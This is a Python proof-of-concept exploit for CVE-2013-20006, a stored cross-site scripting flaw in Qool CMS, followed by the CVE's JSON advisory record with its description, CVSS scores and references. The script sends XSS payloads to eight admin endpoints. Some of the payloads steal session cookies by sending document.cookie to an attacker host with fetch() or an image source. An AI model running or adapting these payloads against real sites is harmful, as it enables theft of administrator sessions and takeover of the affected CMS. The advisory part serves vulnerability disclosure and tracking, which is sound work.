CVE-2013-20006

# CVE-2013-20006 PoC - Qool CMS Stored XSS # Target: Qool CMS admin endpoints # Vulnerability: Stored XSS in POST parameters import requests import sys from urllib.parse import urlencode TARGET_URL = "http://target.com/qool-cms/admin/" # XSS payloads for different parameters PAYLOADS = { 'title': '<script>alert(document.cookie)</script>', 'name': '<img src=x onerror=this.src="https://attacker.com/?c="+document.cookie>', 'email': '" onfocus="alert(1)" autofocus="', 'username': '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>', 'link': 'javascript:alert(document.domain)', 'task': '<iframe src="javascript:alert(document.cookie)">' } ENDPOINTS = [ 'addnewtype', 'addnewdatafield', 'addmenu', 'addusergroup', 'addnewuserfield', 'adduser', 'addgeneraldata', 'addcontentitem' ] def exploit(endpoint, param, payload): """Send malicious POST request to inject XSS""" target = TARGET_URL + endpoint data = { param: payload, 'submit': 'Submit' } try: response = requests.post(target, data=data, timeout=10) print(f"[+] Sent payload to {endpoint} with param {param}") print(f"[+] Payload: {payload}") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("CVE-2013-20006 Qool CMS Stored XSS Exploit") print("=" * 50) # Test all endpoints for endpoint in ENDPOINTS: for param, payload in PAYLOADS.items(): exploit(endpoint, param, payload) print("\n[!] PoC completed. Check if XSS was stored and executed.")

{"cve": {"id": "CVE-2013-20006", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:46.170", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Qool CMS contains multiple persistent cross-site scripting vulnerabilities in several administrative scripts where POST parameters are not properly sanitized before being stored and returned to users. Attackers can inject malicious JavaScript code through parameters like 'title', 'name', 'email', 'username', 'link', and 'task' in endpoints such as addnewtype, addnewdatafield, addmenu, addusergroup, addnewuserfield, adduser, addgeneraldata, and addcontentitem to execute arbitrary scripts in administrator browsers."}, {"lang": "es", "value": "Qool CMS contiene múltiples vulnerabilidades persistentes de cross-site scripting en varios scripts administrativos donde los parámetros POST no se sanean correctamente antes de ser almacenados y devueltos a los usuarios. Los atacantes pueden inyectar código JavaScript malicioso a través de parámetros como 'title', 'name', 'email', 'username', 'link' y 'task' en puntos finales como addnewtype, addnewdatafield, addmenu, addusergroup, addnewuserfield, adduser, addgeneraldata y addcontentitem para ejecutar scripts arbitrarios en los navegadores de los administradores."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5133.php", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/24627", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/qool-cms-multiple-persistent-cross-site-scripting-vulnerabilities", "source": "[email protected]"}]}}